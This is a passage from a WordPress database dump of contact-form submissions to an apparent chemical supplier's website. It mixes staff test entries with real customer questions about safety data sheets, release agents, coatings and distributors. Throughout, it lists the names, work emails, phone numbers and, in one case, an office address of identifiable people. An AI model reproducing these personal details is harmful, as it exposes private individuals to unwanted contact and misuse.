INSERT INTO `wp_postmeta` VALUES (33861, 3801, '_field_3', 'sdsdf'); 
INSERT INTO `wp_postmeta` VALUES (33862, 3801, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33863, 3801, '_sub_id', '3801'); 
INSERT INTO `wp_postmeta` VALUES (33864, 3802, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (33865, 3802, '_seq_num', '245'); 
INSERT INTO `wp_postmeta` VALUES (33866, 3802, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33867, 3802, '_field_12', 'dfsdsfg  sdsdfsd'); 
INSERT INTO `wp_postmeta` VALUES (33868, 3802, '_field_13', 'sgdfgsd'); 
INSERT INTO `wp_postmeta` VALUES (33869, 3802, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (33870, 3802, '_field_14', 'ddillulio@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (33871, 3802, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (33872, 3802, '_field_16', 'teest'); 
INSERT INTO `wp_postmeta` VALUES (33873, 3802, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (33874, 3802, '_sub_id', '3802'); 
INSERT INTO `wp_postmeta` VALUES (33877, 3804, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33878, 3804, '_seq_num', '392'); 
INSERT INTO `wp_postmeta` VALUES (33879, 3804, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33880, 3804, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33881, 3804, '_field_1', 'sdf sdfsdfsdf'); 
INSERT INTO `wp_postmeta` VALUES (33882, 3804, '_field_10', ' sdfd f'); 
INSERT INTO `wp_postmeta` VALUES (33883, 3804, '_field_2', 'ddilulio@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (33884, 3804, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33885, 3804, '_field_3', 'werwerwe'); 
INSERT INTO `wp_postmeta` VALUES (33886, 3804, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33887, 3804, '_sub_id', '3804'); 
INSERT INTO `wp_postmeta` VALUES (33888, 3805, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33889, 3805, '_seq_num', '393'); 
INSERT INTO `wp_postmeta` VALUES (33890, 3805, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33891, 3805, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33892, 3805, '_field_1', 'dfsd sdsdf'); 
INSERT INTO `wp_postmeta` VALUES (33893, 3805, '_field_10', 'sdasd'); 
INSERT INTO `wp_postmeta` VALUES (33894, 3805, '_field_2', 'ddilulio@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (33895, 3805, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33896, 3805, '_field_3', 'assdas'); 
INSERT INTO `wp_postmeta` VALUES (33897, 3805, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33898, 3805, '_sub_id', '3805'); 
INSERT INTO `wp_postmeta` VALUES (33899, 3806, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33900, 3806, '_seq_num', '394'); 
INSERT INTO `wp_postmeta` VALUES (33901, 3806, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33902, 3806, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33903, 3806, '_field_1', 'James Johnson'); 
INSERT INTO `wp_postmeta` VALUES (33904, 3806, '_field_10', 'ESP Associates, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (33905, 3806, '_field_2', 'jim@espnj.com'); 
INSERT INTO `wp_postmeta` VALUES (33906, 3806, '_field_8', '(973) 208-9045'); 
INSERT INTO `wp_postmeta` VALUES (33907, 3806, '_field_3', 'Customer Service,\r\n\r\nDo you make an equal to the following item: http://uk.rs-online.com/web/p/lubricants/2513794/\r\n\r\nGetting this from the UK is an incredible pain in the ***.\r\n\r\nRegards,\r\n\r\nJim\r\n'); 
INSERT INTO `wp_postmeta` VALUES (33908, 3806, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33909, 3806, '_sub_id', '3806'); 
INSERT INTO `wp_postmeta` VALUES (33910, 3807, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33911, 3807, '_seq_num', '395'); 
INSERT INTO `wp_postmeta` VALUES (33912, 3807, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33913, 3807, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33914, 3807, '_field_1', 'Tony Test'); 
INSERT INTO `wp_postmeta` VALUES (33915, 3807, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (33916, 3807, '_field_2', 'ddilulio@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (33917, 3807, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33918, 3807, '_field_3', 'this is a test'); 
INSERT INTO `wp_postmeta` VALUES (33919, 3807, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33920, 3807, '_sub_id', '3807'); 
INSERT INTO `wp_postmeta` VALUES (33921, 3808, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33922, 3808, '_seq_num', '396'); 
INSERT INTO `wp_postmeta` VALUES (33923, 3808, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33924, 3808, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33925, 3808, '_field_1', 'Dale Lundquist'); 
INSERT INTO `wp_postmeta` VALUES (33926, 3808, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (33927, 3808, '_field_2', 'dale.lundquist@harley-davidson.com'); 
INSERT INTO `wp_postmeta` VALUES (33928, 3808, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33929, 3808, '_field_3', 'Good Afternoon,\r\n\r\nMy name is Dale Lundquist and I work for Harley-Davidson in Milwaukee, WI.  We recently went through a chemical audit at our facilities and there were a few products that we had on hand from Milsolv that we did not have MSDS/SDS sheets for.  Some of the products like fairly old so they may be discontinued.  I was wondering if you would be able to provide me the MSDS or SDS for the below product so that we can have the proper documentation on hand.\r\n\r\n- CALIBRE WASH-UP\r\n- COOLANT, LOW CONDUCTIVITY MILLER ELECTRIC ITEM\r\n\r\nAny help with this would be appreciated.\r\n\r\nThanks,\r\n\r\nDale Lundquist\r\n'); 
INSERT INTO `wp_postmeta` VALUES (33930, 3808, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33931, 3808, '_sub_id', '3808'); 
INSERT INTO `wp_postmeta` VALUES (33932, 3809, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33933, 3809, '_seq_num', '397'); 
INSERT INTO `wp_postmeta` VALUES (33934, 3809, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33935, 3809, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33936, 3809, '_field_1', 'test test'); 
INSERT INTO `wp_postmeta` VALUES (33937, 3809, '_field_10', 'sdfsd'); 
INSERT INTO `wp_postmeta` VALUES (33938, 3809, '_field_2', 'ddilulio@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (33939, 3809, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33940, 3809, '_field_3', 'sdfsfd'); 
INSERT INTO `wp_postmeta` VALUES (33941, 3809, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33942, 3809, '_sub_id', '3809'); 
INSERT INTO `wp_postmeta` VALUES (33943, 3806, '_edit_lock', '1488831912:2'); 
INSERT INTO `wp_postmeta` VALUES (33944, 3808, '_edit_lock', '1488836611:1'); 
INSERT INTO `wp_postmeta` VALUES (33945, 3798, '_edit_lock', '1488832019:2'); 
INSERT INTO `wp_postmeta` VALUES (33946, 3799, '_edit_lock', '1488920280:2'); 
INSERT INTO `wp_postmeta` VALUES (33947, 3810, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33948, 3810, '_seq_num', '398'); 
INSERT INTO `wp_postmeta` VALUES (33949, 3810, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33950, 3810, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33951, 3810, '_field_1', 'dan dddddd'); 
INSERT INTO `wp_postmeta` VALUES (33952, 3810, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (33953, 3810, '_field_2', 'ddilulio@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (33954, 3810, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33955, 3810, '_field_3', 'werwerewr'); 
INSERT INTO `wp_postmeta` VALUES (33956, 3810, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33957, 3810, '_sub_id', '3810'); 
INSERT INTO `wp_postmeta` VALUES (33958, 3811, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33959, 3811, '_seq_num', '399'); 
INSERT INTO `wp_postmeta` VALUES (33960, 3811, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33961, 3811, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33962, 3811, '_field_1', 'sdfsdsfd sd dsdsd'); 
INSERT INTO `wp_postmeta` VALUES (33963, 3811, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (33964, 3811, '_field_2', 'ddilulio@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (33965, 3811, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33966, 3811, '_field_3', 'sdsd'); 
INSERT INTO `wp_postmeta` VALUES (33967, 3811, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33968, 3811, '_sub_id', '3811'); 
INSERT INTO `wp_postmeta` VALUES (33969, 3812, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33970, 3812, '_seq_num', '400'); 
INSERT INTO `wp_postmeta` VALUES (33971, 3812, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33972, 3812, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33973, 3812, '_field_1', 'jjj jjjj'); 
INSERT INTO `wp_postmeta` VALUES (33974, 3812, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (33975, 3812, '_field_2', 'ddilulio@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (33976, 3812, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33977, 3812, '_field_3', 'sdafsdf'); 
INSERT INTO `wp_postmeta` VALUES (33978, 3812, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33979, 3812, '_sub_id', '3812'); 
INSERT INTO `wp_postmeta` VALUES (33980, 3813, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33981, 3813, '_seq_num', '401'); 
INSERT INTO `wp_postmeta` VALUES (33982, 3813, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33983, 3813, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33984, 3813, '_field_1', 'Andrew Czorniak'); 
INSERT INTO `wp_postmeta` VALUES (33985, 3813, '_field_10', 'E.c. machining'); 
INSERT INTO `wp_postmeta` VALUES (33986, 3813, '_field_2', 'CzorniakAndrewj@sau.edu'); 
INSERT INTO `wp_postmeta` VALUES (33987, 3813, '_field_8', '(563) 340-9920'); 
INSERT INTO `wp_postmeta` VALUES (33988, 3813, '_field_3', 'I would like to learn more about your ms 153. I am making small aluminum compression castings and I would like to find a release agent that works.'); 
INSERT INTO `wp_postmeta` VALUES (33989, 3813, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33990, 3813, '_sub_id', '3813'); 
INSERT INTO `wp_postmeta` VALUES (33991, 3814, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33992, 3814, '_seq_num', '402'); 
INSERT INTO `wp_postmeta` VALUES (33993, 3814, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33994, 3814, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33995, 3814, '_field_1', 'PAT TEST'); 
INSERT INTO `wp_postmeta` VALUES (33996, 3814, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (33997, 3814, '_field_2', 'DDILLULIO@MSCHEM.COM'); 
INSERT INTO `wp_postmeta` VALUES (33998, 3814, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33999, 3814, '_field_3', 'test'); 
INSERT INTO `wp_postmeta` VALUES (34000, 3814, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34001, 3814, '_sub_id', '3814'); 
INSERT INTO `wp_postmeta` VALUES (34002, 3815, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34003, 3815, '_seq_num', '403'); 
INSERT INTO `wp_postmeta` VALUES (34004, 3815, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34005, 3815, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34006, 3815, '_field_1', 'John John'); 
INSERT INTO `wp_postmeta` VALUES (34007, 3815, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (34008, 3815, '_field_2', 'ddd@jjj.comd'); 
INSERT INTO `wp_postmeta` VALUES (34009, 3815, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34010, 3815, '_field_3', 'dfdfdf'); 
INSERT INTO `wp_postmeta` VALUES (34011, 3815, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34012, 3815, '_sub_id', '3815'); 
INSERT INTO `wp_postmeta` VALUES (34013, 3816, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34014, 3816, '_seq_num', '246'); 
INSERT INTO `wp_postmeta` VALUES (34015, 3816, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34016, 3816, '_field_12', ' sdfdsf wwerwer'); 
INSERT INTO `wp_postmeta` VALUES (34017, 3816, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (34018, 3816, '_field_18', 'eresdfsdf'); 
INSERT INTO `wp_postmeta` VALUES (34019, 3816, '_field_14', 'eee@hhh.com'); 
INSERT INTO `wp_postmeta` VALUES (34020, 3816, '_field_15', '(222) 333-4444'); 
INSERT INTO `wp_postmeta` VALUES (34021, 3816, '_field_16', 'sdfsdf  dfs    dssdfdsfds'); 
INSERT INTO `wp_postmeta` VALUES (34022, 3816, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34023, 3816, '_sub_id', '3816'); 
INSERT INTO `wp_postmeta` VALUES (34024, 3817, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34025, 3817, '_seq_num', '404'); 
INSERT INTO `wp_postmeta` VALUES (34026, 3817, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34027, 3817, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34028, 3817, '_field_1', 'Dan Dan test'); 
INSERT INTO `wp_postmeta` VALUES (34029, 3817, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (34030, 3817, '_field_2', 'ddillulio@msdsdd.com'); 
INSERT INTO `wp_postmeta` VALUES (34031, 3817, '_field_8', '(223) 233-3333'); 
INSERT INTO `wp_postmeta` VALUES (34032, 3817, '_field_3', 'this is a test'); 
INSERT INTO `wp_postmeta` VALUES (34033, 3817, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34034, 3817, '_sub_id', '3817'); 
INSERT INTO `wp_postmeta` VALUES (34035, 3818, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34036, 3818, '_seq_num', '405'); 
INSERT INTO `wp_postmeta` VALUES (34037, 3818, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34038, 3818, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34039, 3818, '_field_1', 'sdfsdf s sdfsdfsdfsdfsdfsdf sd'); 
INSERT INTO `wp_postmeta` VALUES (34040, 3818, '_field_10', 'sdfsd fsf'); 
INSERT INTO `wp_postmeta` VALUES (34041, 3818, '_field_2', 'iiooioi@lllll.com'); 
INSERT INTO `wp_postmeta` VALUES (34042, 3818, '_field_8', '(343) 433-3344'); 
INSERT INTO `wp_postmeta` VALUES (34043, 3818, '_field_3', 'sdfgdfgsf'); 
INSERT INTO `wp_postmeta` VALUES (34044, 3818, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34045, 3818, '_sub_id', '3818'); 
INSERT INTO `wp_postmeta` VALUES (34046, 3819, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34047, 3819, '_seq_num', '247'); 
INSERT INTO `wp_postmeta` VALUES (34048, 3819, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34049, 3819, '_field_12', 'Ronnie'); 
INSERT INTO `wp_postmeta` VALUES (34050, 3819, '_field_13', 'SmartStone'); 
INSERT INTO `wp_postmeta` VALUES (34051, 3819, '_field_18', 'Benz'); 
INSERT INTO `wp_postmeta` VALUES (34052, 3819, '_field_14', 'ronnie.yu@smartstone-tech.com'); 
INSERT INTO `wp_postmeta` VALUES (34053, 3819, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (34054, 3819, '_field_16', '1,Operating temp range:-40...280℃, short time(around 10min) 300℃.If can&#039;t meet this, please suggest your highest temp range one.\r\n\r\n2,It is used for potting the coil system which is formed with coil, magnet and PEEK plastic coil former. That means it can’t be too hard, otherwise it is easy to fracture the coil wire.\r\n\r\n3,The coil system is potted in a stainless steel housing. The volume of the housing cavity is small, the inner diameter of the housing is around 8mm, just need about 1mL-2mL for per housing, and the gap between coil system and housing inner surface is just around 1mm.\r\n\r\n4,For prototypes we will pot manually for example with a needle, for mass production we will use the automatic process. Yearly volume is around 200kpcs sensors.\r\n\r\n5,For the gel time, it is better to be short in oven with high temp, but it is not mandatory,room temp for one day for example is also ok. The key are above requirements.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34055, 3819, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34056, 3819, '_sub_id', '3819'); 
INSERT INTO `wp_postmeta` VALUES (34057, 3820, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34058, 3820, '_seq_num', '406'); 
INSERT INTO `wp_postmeta` VALUES (34059, 3820, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34060, 3820, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34061, 3820, '_field_1', 'Rajendra laddha'); 
INSERT INTO `wp_postmeta` VALUES (34062, 3820, '_field_10', 'Shrikrishna Sales &amp;  Agency'); 
INSERT INTO `wp_postmeta` VALUES (34063, 3820, '_field_2', 'rajendraladdha.laddha667@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (34064, 3820, '_field_8', '(937) 310-8625'); 
INSERT INTO `wp_postmeta` VALUES (34065, 3820, '_field_3', 'we want to know that from where we will get your products In India and do you have any person to looking for India Market '); 
INSERT INTO `wp_postmeta` VALUES (34066, 3820, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34067, 3820, '_sub_id', '3820'); 
INSERT INTO `wp_postmeta` VALUES (34068, 3821, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34069, 3821, '_seq_num', '407'); 
INSERT INTO `wp_postmeta` VALUES (34070, 3821, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34071, 3821, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34072, 3821, '_field_1', 'PRIYA M'); 
INSERT INTO `wp_postmeta` VALUES (34073, 3821, '_field_10', 'UMAC AVIONICS PTE LIMITED'); 
INSERT INTO `wp_postmeta` VALUES (34074, 3821, '_field_2', 'tech@umacintl.com'); 
INSERT INTO `wp_postmeta` VALUES (34075, 3821, '_field_8', '(656) 846-4085'); 
INSERT INTO `wp_postmeta` VALUES (34076, 3821, '_field_3', 'Dear Sir,\r\nPlease confirm the Date of Mfg.&amp; date of expiry as we need to forward to our customer.\r\nPriya\r\nUMAC AVIONICS PTE LIMITED\r\n391B ORCHARD ROAD\r\n#23-01 NGEE ANN CITY TOWER B,\r\nSINGAPORE - 238874.\r\nTelefax : +65 68464085\r\nwww.umacintl.com\r\nEmail: tech@umacintl.com\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34077, 3821, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34078, 3821, '_sub_id', '3821'); 
INSERT INTO `wp_postmeta` VALUES (34079, 3822, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34080, 3822, '_seq_num', '408'); 
INSERT INTO `wp_postmeta` VALUES (34081, 3822, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34082, 3822, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34083, 3822, '_field_1', 'Pamela Larivee'); 
INSERT INTO `wp_postmeta` VALUES (34084, 3822, '_field_10', 'Dirats Laboratories'); 
INSERT INTO `wp_postmeta` VALUES (34085, 3822, '_field_2', 'pel@diratslabs.com'); 
INSERT INTO `wp_postmeta` VALUES (34086, 3822, '_field_8', '(413) 568-1571'); 
INSERT INTO `wp_postmeta` VALUES (34087, 3822, '_field_3', 'Still updating files and found a couple items I don&#039;t have SDS for. I&#039;m not sure if they even have one. I looked on your website and was unable to find them. MS-530 Contact Re-NU and MS-260 Cleaner.\r\nThank You for your help.\r\nPam'); 
INSERT INTO `wp_postmeta` VALUES (34088, 3822, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34089, 3822, '_sub_id', '3822'); 
INSERT INTO `wp_postmeta` VALUES (34090, 3823, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34091, 3823, '_seq_num', '409'); 
INSERT INTO `wp_postmeta` VALUES (34092, 3823, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34093, 3823, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34094, 3823, '_field_1', 'Jonathan Batt'); 
INSERT INTO `wp_postmeta` VALUES (34095, 3823, '_field_10', 'TA Instruments'); 
INSERT INTO `wp_postmeta` VALUES (34096, 3823, '_field_2', 'jbatt@tainstruments.com'); 
INSERT INTO `wp_postmeta` VALUES (34097, 3823, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34098, 3823, '_field_3', 'I am in need of a United States format, GHS-compliant SDS for your MS-322B PTFE release agent spray. I am unable to find this product in the SDS listings on your website.'); 
INSERT INTO `wp_postmeta` VALUES (34099, 3823, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34100, 3823, '_sub_id', '3823'); 
INSERT INTO `wp_postmeta` VALUES (34101, 3824, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34102, 3824, '_seq_num', '410'); 
INSERT INTO `wp_postmeta` VALUES (34103, 3824, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34104, 3824, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34105, 3824, '_field_1', 'Steven Exelby'); 
INSERT INTO `wp_postmeta` VALUES (34106, 3824, '_field_10', 'University of Michigan'); 
INSERT INTO `wp_postmeta` VALUES (34107, 3824, '_field_2', 'scexlb@umich.edu'); 
INSERT INTO `wp_postmeta` VALUES (34108, 3824, '_field_8', '(907) 441-2003'); 
INSERT INTO `wp_postmeta` VALUES (34109, 3824, '_field_3', 'Hello I am using EPON Resin 815c and EPIKURE 3140 to coat a cathode. I am having trouble with bubbles forming in the cured product. My cathode must  work in vacuum at approximately 300 kV so I am very concerned about them forming a weak point where the voltage may not be able to hold off. Is there a way to reduce/eliminate bubble formation? Also is there any information of the dielectric strength of the solid dielectric? I only found the dielectric constant on the data sheet.\r\n\r\nThanks,\r\nSteve'); 
INSERT INTO `wp_postmeta` VALUES (34110, 3824, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34111, 3824, '_sub_id', '3824'); 
INSERT INTO `wp_postmeta` VALUES (34112, 3825, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34113, 3825, '_seq_num', '411'); 
INSERT INTO `wp_postmeta` VALUES (34114, 3825, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34115, 3825, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34116, 3825, '_field_1', 'Christopher Baker'); 
INSERT INTO `wp_postmeta` VALUES (34117, 3825, '_field_10', 'Abbott Laboratories'); 
INSERT INTO `wp_postmeta` VALUES (34118, 3825, '_field_2', 'christopher.j.baker@abbott.com'); 
INSERT INTO `wp_postmeta` VALUES (34119, 3825, '_field_8', '(224) 361-7695'); 
INSERT INTO `wp_postmeta` VALUES (34120, 3825, '_field_3', 'Hi,\r\n\r\nI have a question concerning compatibility with one of your teflon products. How does the MS-122AD spray, applied to nickel plated aluminum, hold up to trichloroethylene? I want to ensure there is no degradation of the sprayed surface after it goes through a 1 minute exposure to trichloroethylene. My internet research so far regarding teflon compatibility with trichloroethylene indicates that I should not be worried. Are there any conditions under which trichloroethylene can degrade the MS-122AD coating?\r\n\r\nI am often unavailable by phone - please use email to contact me. \r\n\r\nThank you,\r\nChris\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34121, 3825, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34122, 3825, '_sub_id', '3825'); 
INSERT INTO `wp_postmeta` VALUES (34123, 3826, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34124, 3826, '_seq_num', '412'); 
INSERT INTO `wp_postmeta` VALUES (34125, 3826, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34126, 3826, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34127, 3826, '_field_1', 'wenyi yang'); 
INSERT INTO `wp_postmeta` VALUES (34128, 3826, '_field_10', 'evoqua pte ltd'); 
INSERT INTO `wp_postmeta` VALUES (34129, 3826, '_field_2', 'wenyi.yang@evoqua.com'); 
INSERT INTO `wp_postmeta` VALUES (34130, 3826, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34131, 3826, '_field_3', 'Do you have distributer in Asia or Singapore\nI want to buy ms-122ad ptfe releasing agent'); 
INSERT INTO `wp_postmeta` VALUES (34132, 3826, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34133, 3826, '_sub_id', '3826'); 
INSERT INTO `wp_postmeta` VALUES (34134, 3827, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34135, 3827, '_seq_num', '413'); 
INSERT INTO `wp_postmeta` VALUES (34136, 3827, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34137, 3827, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34138, 3827, '_field_1', 'IRENE NAH'); 
INSERT INTO `wp_postmeta` VALUES (34139, 3827, '_field_10', 'XYRIX ELECTRONICS PTE LTD'); 
INSERT INTO `wp_postmeta` VALUES (34140, 3827, '_field_2', 'irene@xyrix.com.sg'); 
INSERT INTO `wp_postmeta` VALUES (34141, 3827, '_field_8', '(656) 842-4837'); 
INSERT INTO `wp_postmeta` VALUES (34142, 3827, '_field_3', 'Hi there,\n\nPlease quote your best for the below item\n\nRemarks               : All items quoted Must Be Rohs \n\nDESC : SEALER N/A CONFORMAL COATING MS-470C	\nMILLER-STEPHENSON P/N: 	MS-470N\nQTY/MTH           : Please quote based on MOQ\n\n\n'); 
INSERT INTO `wp_postmeta` VALUES (34143, 3827, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34144, 3827, '_sub_id', '3827'); 
INSERT INTO `wp_postmeta` VALUES (34145, 3828, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34146, 3828, '_seq_num', '414'); 
INSERT INTO `wp_postmeta` VALUES (34147, 3828, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34148, 3828, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
